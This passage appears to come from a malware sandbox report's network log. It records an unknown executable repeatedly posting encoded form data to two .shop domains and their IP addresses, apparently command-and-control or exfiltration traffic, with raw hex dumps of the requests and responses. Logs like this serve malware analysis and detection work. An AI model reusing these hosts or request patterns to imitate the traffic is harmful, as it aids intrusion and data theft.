                                                                                                            Data Raw: 31 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 52 d9 6e 9c 30 14 7d cf 57 dc 3a aa e6 25 06 66 49 53 61 20 52 22 e5 b1 ff 70 31 0e 78 e2 85 da 66 02 fd fa 1a 33 5d 22 e5 ed de e3 63 9f 45 ae 86 a0 55 73 53 0d 02 bb e6 06 a0 d2 22 20 18 d4 a2 26 17 29 de 47 eb 02 01 6e 4d 10 26 d4 e4 5d 76 61 a8 3b 71 91 5c d0 b4 dc 49 23 83 44 45 3d 47 25 ea fd 9d 8e 80 9e f4 bf 1d e7 0f fb e4 85 4b 87 d8 46 be b1 04 f2 24 ec b9 93 63 00 ef 78 4d f2 71 6a 95 e4 f9 19 2f b8 e1 f9 f9 e7 24 dc 42 0f d9 21 3b 66 51 23 3b fb c7 4b 4d 00 c2 32 46 af 41 cc e1 3f 3a 69 aa 7c bb 18 b3 e5 5b b8 aa b5 dd 02 3e 2c 51 96 b4 c8 df 7a 67 27 d3 51 6e 95 75 25 dc 7e eb f0 9e 1f 19 89 37 a4 ee af c4 9d c6 79 0b 5a c2 a9 28 c6 99 a5 d4 25 ec 8b e2 2b 1b ad 8f e1 ad 29 01 5b 6f d5 14 04 73 b2 1f 42 09 05 0b 76 2c e1 18 49 4a bc 26 40 a3 eb 65 a4 16 80 53 b0 6c f7 31 aa d4 d8 8b fc 54 9c b2 d1 f4 24 56 52 7d a1 b4 1a f6 7f 7c 5c 65 37 0f 9f e8 6e af d3 4d 8c 1e 92 d5 2b 96 9c d0 ef 2b 92 c6 fb bf a6 d6 a9 93 7e 54 b8 94 d0 2a cb df d8 [TRUNCATED]
                                                                                                            Data Ascii: 18dmRn0}W:%fISa R"p1xf3]"cEUsS" &)GnM&]va;q\I#DE=G%KF$cxMqj/$B!;fQ#;KM2FA?:i|[>,Qzg'Qnu%~7yZ(%+)[osBv,IJ&@eSl1T$VR}|\e7nM++~T*/*M'}yzx~xfkcp&r6Z&kka~1h0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            27192.168.2.5500048.210.114.150802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:57:07.839998007 CET1647OUTPOST /rsvy/ HTTP/1.1
                                                                                                            Host: www.llljjjiii.shop
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.llljjjiii.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 1240
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.llljjjiii.shop/rsvy/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 6d 2b 37 4b 49 4d 74 4a 34 2f 42 54 32 71 34 67 38 42 64 6b 36 7a 50 2f 75 41 43 44 4f 44 30 64 6f 6e 76 50 46 38 39 58 31 4d 7a 77 30 43 38 49 50 47 37 45 2b 63 66 42 4b 57 30 56 4e 58 4e 58 4f 67 4c 46 61 58 33 74 79 41 62 6a 65 4b 49 62 76 49 70 4c 5a 76 36 54 6b 45 6f 41 39 53 65 36 35 6a 71 2f 34 61 7a 59 62 65 61 55 43 6a 67 72 76 31 68 2f 31 38 6f 4c 5a 2f 74 78 30 63 43 59 6f 77 57 44 55 59 66 73 33 4e 4e 6c 7a 32 57 58 71 63 46 33 4a 6d 39 52 39 4b 61 2f 79 48 52 46 47 36 65 71 77 61 64 43 59 62 39 7a 6a 53 45 48 43 54 47 2f 65 2f 62 7a 6c 49 52 49 63 65 37 4b 4a 62 78 62 2f 39 61 66 42 71 66 32 76 39 49 46 79 39 7a 46 61 6d 52 48 39 68 63 70 38 58 53 6c 53 48 50 4a 58 76 38 65 4d 50 61 5a 2f 76 51 67 6f 72 54 62 70 66 77 78 6f 51 69 4d 6f 66 42 6f 4c 37 66 59 2f 38 48 7a 75 64 59 4b 73 77 4d 63 4b 50 55 57 31 6d 74 73 78 52 37 66 52 6a 72 53 73 6a 62 43 4e 49 54 31 42 72 33 76 51 31 71 4f 33 58 4a 62 45 2b 63 32 4e 39 48 44 48 45 61 38 4e 6e 39 6e 53 39 6a 6d 31 6b 30 4e 65 7a [TRUNCATED]
                                                                                                            Data Ascii: cla=m+7KIMtJ4/BT2q4g8Bdk6zP/uACDOD0donvPF89X1Mzw0C8IPG7E+cfBKW0VNXNXOgLFaX3tyAbjeKIbvIpLZv6TkEoA9Se65jq/4azYbeaUCjgrv1h/18oLZ/tx0cCYowWDUYfs3NNlz2WXqcF3Jm9R9Ka/yHRFG6eqwadCYb9zjSEHCTG/e/bzlIRIce7KJbxb/9afBqf2v9IFy9zFamRH9hcp8XSlSHPJXv8eMPaZ/vQgorTbpfwxoQiMofBoL7fY/8HzudYKswMcKPUW1mtsxR7fRjrSsjbCNIT1Br3vQ1qO3XJbE+c2N9HDHEa8Nn9nS9jm1k0NezUwKblbHr4U9x1x1wqMjEj1cENApSGLFAPkM9q+dCu8TiLlk9/b+sK7+wNvT2ALQsQYxIhDQfq2I60pfEfYO3PI/w1Bb4AUjPGlY0Gkur3WpFND2iJvlEbAxbdnxDAuKe/H0mYMe2A2SPOwDXtmEeFYgqGccG6az6zxfH12wWkv1h9s+kqxLMwpCjiOYu88NZMkkk1U4e45m3J1e3XkAjo1YqM/36uH3rGlHkwHVRRocVf7wivKVsCRFfx3dMKthobe1zCu9RPA9LQ5fyQLm2N6FO2Kd162R7TuVbte/nLtQZwz4vkabTQ5gZK50TSNxa0z8LV+8m9xlPbXSajmtBT092FIyqKTSp08vf15lPk2NtJczG8ONt5FFYvUeSTZ+NqA3TVvDJWg7/BaUxA+jBpZ0bqXzGJZtEsE0FfUgkx5cO6GbizPyQGLexZiCGJk3AKl+Bdhu3fm68oGqPt6s6kvwjLVRUqE5dDELpbLIVgrRLEkcCbTJc1coFQCw/Xx+B7ktyDyNVEAKtsWBftDXutX+HZLNCBVt/XSN9XEVDfbW+no+llplMT4jJ+gR9fonGeTQKbk8AIiyp5fZo8bOVUY4ivN1oG4uITYG+vFHxWbvxkHsIzxWRCJYQXNhpWwZeSLrcegrdU/4KdHYx38/sa5lF5vES8B/Z9r [TRUNCATED]
                                                                                                            Nov 22, 2024 07:57:09.494505882 CET925INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:57:09 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: PHPSESSID=i9s8d6s9sj3gcfedk170uo8aq3; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                            Pragma: no-cache
                                                                                                            Set-Cookie: sessionid=i9s8d6s9sj3gcfedk170uo8aq3; expires=Mon, 20-Nov-2034 06:57:09 GMT; Max-Age=315360000; path=/
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 31 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 52 d9 6e 9c 30 14 7d cf 57 dc 3a aa e6 25 06 66 49 53 61 20 52 22 e5 b1 ff 70 31 0e 78 e2 85 da 66 02 fd fa 1a 33 5d 22 e5 ed de e3 63 9f 45 ae 86 a0 55 73 53 0d 02 bb e6 06 a0 d2 22 20 18 d4 a2 26 17 29 de 47 eb 02 01 6e 4d 10 26 d4 e4 5d 76 61 a8 3b 71 91 5c d0 b4 dc 49 23 83 44 45 3d 47 25 ea fd 9d 8e 80 9e f4 bf 1d e7 0f fb e4 85 4b 87 d8 46 be b1 04 f2 24 ec b9 93 63 00 ef 78 4d f2 71 6a 95 e4 f9 19 2f b8 e1 f9 f9 e7 24 dc 42 0f d9 21 3b 66 51 23 3b fb c7 4b 4d 00 c2 32 46 af 41 cc e1 3f 3a 69 aa 7c bb 18 b3 e5 5b b8 aa b5 dd 02 3e 2c 51 96 b4 c8 df 7a 67 27 d3 51 6e 95 75 25 dc 7e eb f0 9e 1f 19 89 37 a4 ee af c4 9d c6 79 0b 5a c2 a9 28 c6 99 a5 d4 25 ec 8b e2 2b 1b ad 8f e1 ad 29 01 5b 6f d5 14 04 73 b2 1f 42 09 05 0b 76 2c e1 18 49 4a bc 26 40 a3 eb 65 a4 16 80 53 b0 6c f7 31 aa d4 d8 8b fc 54 9c b2 d1 f4 24 56 52 7d a1 b4 1a f6 7f 7c 5c 65 37 0f 9f e8 6e af d3 4d 8c 1e 92 d5 2b 96 9c d0 ef 2b 92 c6 fb bf a6 d6 a9 93 7e 54 b8 94 d0 2a cb df d8 [TRUNCATED]
                                                                                                            Data Ascii: 18dmRn0}W:%fISa R"p1xf3]"cEUsS" &)GnM&]va;q\I#DE=G%KF$cxMqj/$B!;fQ#;KM2FA?:i|[>,Qzg'Qnu%~7yZ(%+)[osBv,IJ&@eSl1T$VR}|\e7nM++~T*/*M'}yzx~xfkcp&r6Z&kka~1h0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            28192.168.2.5500058.210.114.150802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:57:10.511018991 CET352OUTGET /rsvy/?cla=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rRtv3mUECyzOywyqf8KPBYdutbjoA70JSrcAbMdNFzubz8Q==&jbeXk=EHbdQPuX HTTP/1.1
                                                                                                            Host: www.llljjjiii.shop
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Nov 22, 2024 07:57:12.240935087 CET1120INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Fri, 22 Nov 2024 06:57:11 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Set-Cookie: PHPSESSID=lssgj5pdrsim94isfuk3kkdd96; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                            Pragma: no-cache
                                                                                                            Set-Cookie: sessionid=lssgj5pdrsim94isfuk3kkdd96; expires=Mon, 20-Nov-2034 06:57:11 GMT; Max-Age=315360000; path=/
                                                                                                            Data Raw: 32 36 38 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 75 62 6c 69 63 2f 6a 61 76 61 73 63 72 69 70 74 2f 6a 71 75 65 72 79 2d 32 2e 32 2e 33 2e 6d 69 6e 2e 6a 73 3f 76 3d 22 20 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 36 64 61 35 63 33 3b 22 3e 0a 3c 69 6d 67 20 73 74 79 6c 65 3d 27 6d 61 78 2d 77 69 64 74 68 3a 20 34 30 30 70 78 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c [TRUNCATED]
                                                                                                            Data Ascii: 268<html><head> <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" /> <script src="/public/javascript/jquery-2.2.3.min.js?v=" type="text/javascript"></script></head><body style="background-color: #6da5c3;"><img style='max-width: 400px;width: 100%;position: absolute;right: 0;top: 30%;left: 0;margin: 0 auto;' src="/public/image/404.png"/>...<h1 style='width: 400px;position: absolute;margin-left: -200px;margin-top: -80px;top: 50%;left: 50%;display: block;z-index: 2000;color:#FB7C7C;text-align: center'> 404 Not Found </h1>--></body></html>0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            29192.168.2.550006172.67.209.48802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:57:17.701783895 CET616OUTPOST /huvt/ HTTP/1.1
                                                                                                            Host: www.ampsamkok88.shop
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.ampsamkok88.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 204
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 2f 7a 2f 30 37 79 78 66 44 6a 58 32 36 65 38 69 65 39 53 76 70 54 2b 72 38 6a 6f 6b 73 32 31 35 50 36 31 57 62 67 4e 34 74 54 36 63 7a 63 31 6a 47 52 50 39 6d 61 35 4b 6e 4a 4b 36 64 38 44 51 53 78 51 43 64 57 52 39 68 77 66 5a 63 59 31 39 38 65 4e 75 5a 46 6a 52 52 4f 6c 73 35 62 4a 49 71 2f 41 73 77 49 71 46 6c 65 57 71 4c 34 35 63 56 2b 33 77 51 4e 4f 57 75 33 6b 69 31 63 73 76 6b 59 71 73 4c 53 47 54 64 4e 37 48 59 4f 56 56 58 50 78 72 6f 46 34 66 50 51 79 6c 31 37 46 4f 6e 75 2f 30 42 69 36 6c 4c 37 4e 62 58 46 59 31 43 31 59 66 77 50 43 41 6a 51 44 50 51 63 78 45 69 6a 48 65 5a 74 77 3d
                                                                                                            Data Ascii: cla=/z/07yxfDjX26e8ie9SvpT+r8joks215P61WbgN4tT6czc1jGRP9ma5KnJK6d8DQSxQCdWR9hwfZcY198eNuZFjRROls5bJIq/AswIqFleWqL45cV+3wQNOWu3ki1csvkYqsLSGTdN7HYOVVXPxroF4fPQyl17FOnu/0Bi6lL7NbXFY1C1YfwPCAjQDPQcxEijHeZtw=
                                                                                                            Nov 22, 2024 07:57:18.847464085 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 22 Nov 2024 06:57:18 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lx6tld4bcQrQ9l%2BsJmRuAzfA2d2yfC9iTswCWaKBTuh1ASCuj%2FPmE2%2Bszg9%2FgeZOEVEanS1cSlHPGt%2ByeAY48dbfs%2FQBN7jfyYtnEYZxUHJEbE3vj0iezcVPdIX44K654Kil7FIA9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e67064b5e907d16-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1769&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=616&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 32 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0d a5 b2 21 b5 92 91 b5 5b fd 03 ba 24 65 85 a4 29 5b ca 28 63 14 59 3a db 2a 8e e4 49 4a 42 9a f8 7f 1f b6 d3 34 2b b4 63 1f 0c 92 ee bd 7b 77 a7 67 05 47 c3 e9 60 76 7f 3b 42 5f 67 93 31 ba bd fb 32 be 1e a0 f6 29 21 d7 a3 d9 15 21 c3 d9 b0 89 7c f0 ba 84 8c 6e da 51 2b c8 ec 3c 8f 82 0c 28 8f 5a 81 15 36 87 a8 df ed a3 1b 65 d1 95 5a 48 1e 90 e6 b0 15 90 1a 14 c4 8a af 2b 5e 2f 3a c0 64 bd a8 15 14 d1 2c 03 a4 e1 f7 02 8c 05 8e ee be 8d d1 8a 1a 24 95 45 49 85 43 4a 22 9b 09 83 0c e8 25 68 2f 20 45 4d bb e4 5c 58 a1 24 cd f3 75 07 51 f4 57 01 2d d0 5a e9 3a 11 48 a6 16 d2 82 06 8e 56 99 c8 01 59 bd 16 32 45 56 a1 85 01 44 25 1a 55 e0 a1 62 8b 39 48 5b 9d 67 54 f2 0a f8 52 d9 4e d6 30 2d 0a 1b 39 c9 42 b2 4a dc 71 37 cf 4b c4 1c 77 b3 a4 1a c5 21 f5 98 92 16 a4 7d ce b9 dd ee 8f 7e 08 c9 d5 ca e3 bb 88 2f 12 27 6e 78 3c 8c 3d a6 81 5a 18 e5 50 c5 1c dc c8 61 d7 e7 9e 90 12 74 75 0f 61 7b d5 a4 78 78 18 5c 1d b3 e5 71 41 [TRUNCATED]
                                                                                                            Data Ascii: 2a8Tk0B![$e)[(cY:*IJB4+c{wgG`v;B_g12)!!|nQ+<(Z6eZH+^/:d,$EICJ"%h/ EM\X$uQW-Z:HVY2EVD%Ub9H[gTRN0-9BJq7Kw!}~/'nx<=ZPatua{xx\qA5p/'8;{{gc/d&i:&qW4|MuI%30.OY*hLMfdN
                                                                                                            Nov 22, 2024 07:57:18.847489119 CET254INData Raw: 0d f6 f7 1a 29 d8 9d 80 f9 b2 9e d1 f4 86 ce c1 c1 95 4b b0 fb b3 fb cb a3 45 01 92 0f 32 91 73 87 ba 7e db 8f ff 8b c2 dd b2 14 89 b3 97 ab 8c d7 8c f7 ed 3e 45 a2 e9 1c ea 3e 33 10 69 66 c3 9e 4f bd 95 e0 36 ab 57 c6 ae 73 f0 0a 65 6a bf 85 98
                                                                                                            Data Ascii: )KE2s~>E>3ifO6WsejFx]=Js!JPXCA$D\Q.df4Pn9$ggh A{1XQwXH*YJeT2cwNy/teY}Q@''
                                                                                                            Nov 22, 2024 07:57:18.847660065 CET21INData Raw: 62 0d 0a e3 02 00 9d 21 bb 3f e5 04 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: b!?0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            30192.168.2.550007172.67.209.48802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:57:20.368664026 CET636OUTPOST /huvt/ HTTP/1.1
                                                                                                            Host: www.ampsamkok88.shop
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.ampsamkok88.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 224
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 2f 7a 2f 30 37 79 78 66 44 6a 58 32 34 2b 4d 69 53 36 2b 76 34 44 2b 73 67 54 6f 6b 33 47 30 2b 50 36 70 57 62 6b 55 6e 74 6c 69 63 79 39 46 6a 48 54 72 39 32 4b 35 4b 79 35 4b 37 54 63 44 62 53 78 63 38 64 58 39 39 68 77 4c 5a 63 64 4a 39 37 76 4e 70 59 56 6a 54 64 75 6c 75 6b 4c 4a 49 71 2f 41 73 77 49 75 72 6c 65 4f 71 4c 4c 78 63 57 66 33 7a 54 4e 4f 56 70 33 6b 69 2f 38 73 72 6b 59 71 43 4c 54 62 38 64 4f 44 48 59 4f 6c 56 58 62 74 73 6a 46 34 6a 4c 51 7a 41 77 34 73 58 68 74 79 2f 42 56 66 48 59 74 35 35 62 54 70 66 59 58 51 33 6a 76 75 34 7a 44 4c 34 42 73 51 74 34 41 58 75 48 36 6b 5a 51 4c 63 76 7a 69 33 61 45 51 51 31 6e 35 6d 78 5a 50 68 46
                                                                                                            Data Ascii: cla=/z/07yxfDjX24+MiS6+v4D+sgTok3G0+P6pWbkUntlicy9FjHTr92K5Ky5K7TcDbSxc8dX99hwLZcdJ97vNpYVjTdulukLJIq/AswIurleOqLLxcWf3zTNOVp3ki/8srkYqCLTb8dODHYOlVXbtsjF4jLQzAw4sXhty/BVfHYt55bTpfYXQ3jvu4zDL4BsQt4AXuH6kZQLcvzi3aEQQ1n5mxZPhF
                                                                                                            Nov 22, 2024 07:57:21.564651012 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 22 Nov 2024 06:57:21 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SID2QwSk%2BPOSiw0rW%2FIo2WX88yWRZ1Bznn1mOwHD5k05Idpzy7vlJygkc1qRm9xV0rg96Ip9R%2B4nGYALhARMUiMtLBgjjT1EejHi5nOq07qxpfY37KLKoXXbBRPV8B6fmoxplGKyEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e67065c3ac4558f-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1465&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=636&delivery_rate=0&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 32 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0d a5 b2 21 b5 92 2d ed 4a fd 03 da 24 65 85 a4 2d 6b ca 28 63 14 59 3a db 2a 8e e4 49 4a 42 96 f8 7f 1f b6 d3 34 2b b4 63 1f 0c 92 ee bd 7b 77 a7 67 05 07 c3 db c1 f4 f1 6e 84 be 4e 27 63 74 f7 70 39 be 1e a0 f6 31 21 d7 a3 e9 15 21 c3 e9 b0 89 7c f2 ba 84 8c 6e da 51 2b c8 ec 2c 8f 82 0c 28 8f 5a 81 15 36 87 a8 df ed a3 1b 65 d1 95 9a 4b 1e 90 e6 b0 15 90 1a 14 c4 8a af 2a 5e 2f da c3 64 bd a8 15 14 d1 34 03 a4 e1 d7 1c 8c 05 8e 1e be 8d d1 92 1a 24 95 45 49 85 43 4a 22 9b 09 83 0c e8 05 68 2f 20 45 4d bb e0 5c 58 a1 24 cd f3 55 07 51 f4 57 01 2d d0 5a e9 3a 11 48 a6 e6 d2 82 06 8e 96 99 c8 01 59 bd 12 32 45 56 a1 b9 01 44 25 1a 55 e0 a1 62 f3 19 48 5b 9d 67 54 f2 0a f8 5a d9 56 d6 30 2d 0a 1b 39 c9 5c b2 4a dc 71 d7 2f 4b c4 1c 77 bd a0 1a c5 21 f5 98 92 16 a4 7d c9 b9 d9 ec 8e be 0b c9 d5 d2 e3 db 88 2f 12 27 6e 78 3c 8c 3d a6 81 5a 18 e5 50 c5 1c dc c8 61 d7 e7 9e 90 12 74 75 0f 61 7b d9 a4 78 7a 1a 5c 1d b2 c5 61 41 [TRUNCATED]
                                                                                                            Data Ascii: 2b3Tk0B!-J$e-k(cY:*IJB4+c{wgnN'ctp91!!|nQ+,(Z6eK*^/d4$EICJ"h/ EM\X$UQW-Z:HY2EVD%UbH[gTZV0-9\Jq/Kw!}/'nx<=ZPatua{xz\aA5p~ONx2e'cwr_NdiRJ21g41a\T<qS(=#g=4R
                                                                                                            Nov 22, 2024 07:57:21.564688921 CET264INData Raw: 5b 01 73 b9 9a d2 f4 86 ce c0 c1 95 4b b0 fb a3 fb d3 a3 45 01 92 0f 32 91 73 87 ba 7e db 8f ff 8b c2 dd b2 14 89 b3 93 ab 8c d7 8c f7 fd 3e 45 a2 e9 0c ea 3e 33 10 69 66 c3 9e 4f bd a5 e0 36 ab 57 c6 ae 72 f0 0a 65 6a bf 85 98 c6 46 e5 73 0b 78
                                                                                                            Data Ascii: [sKE2s~>E>3ifO6WrejFsx]Js!JQXBA$D\Q.df4P5|iXm1XQwXJ*YJeT2cwN(teY}Q@'' S


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            31192.168.2.550008172.67.209.48802128C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 22, 2024 07:57:23.025753021 CET1653OUTPOST /huvt/ HTTP/1.1
                                                                                                            Host: www.ampsamkok88.shop
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.ampsamkok88.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 1240
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                            Data Raw: 63 6c 61 3d 2f 7a 2f 30 37 79 78 66 44 6a 58 32 34 2b 4d 69 53 36 2b 76 34 44 2b 73 67 54 6f 6b 33 47 30 2b 50 36 70 57 62 6b 55 6e 74 6c 71 63 79 50 39 6a 42 7a 58 39 31 4b 35 4b 7a 35 4b 2b 54 63 44 4b 53 78 45 34 64 58 42 48 68 79 7a 5a 54 59 46 39 2b 62 68 70 57 6c 6a 54 41 2b 6c 76 35 62 4a 6e 71 2f 77 57 77 49 2b 72 6c 65 4f 71 4c 4e 56 63 43 65 33 7a 56 4e 4f 57 75 33 6b 75 31 63 74 32 6b 65 44 2f 4c 54 66 57 63 2b 6a 48 57 4b 42 56 53 6f 46 73 2f 56 34 62 4f 51 7a 69 77 34 77 79 68 74 76 41 42 51 4c 74 59 71 4e 35 5a 58 77 2b 4b 30 30 47 79 76 32 6c 68 68 6a 68 41 4e 77 64 34 7a 4c 31 50 4b 49 39 61 5a 34 4d 35 30 61 5a 45 7a 56 70 6b 39 43 6d 62 72 38 45 33 35 69 5a 30 50 72 76 53 34 31 56 6c 31 59 48 49 6b 56 69 4e 77 52 4d 35 44 36 69 30 71 35 47 6c 31 47 38 78 69 7a 45 62 64 31 4f 38 33 55 70 42 47 38 35 4e 7a 64 55 64 5a 48 43 4f 36 64 58 77 52 35 71 36 4c 74 57 72 78 67 45 56 76 43 2b 67 37 36 4b 57 68 30 50 58 50 58 45 32 37 44 4f 51 74 47 62 2b 35 50 36 55 67 42 41 79 56 33 62 6e 56 [TRUNCATED]
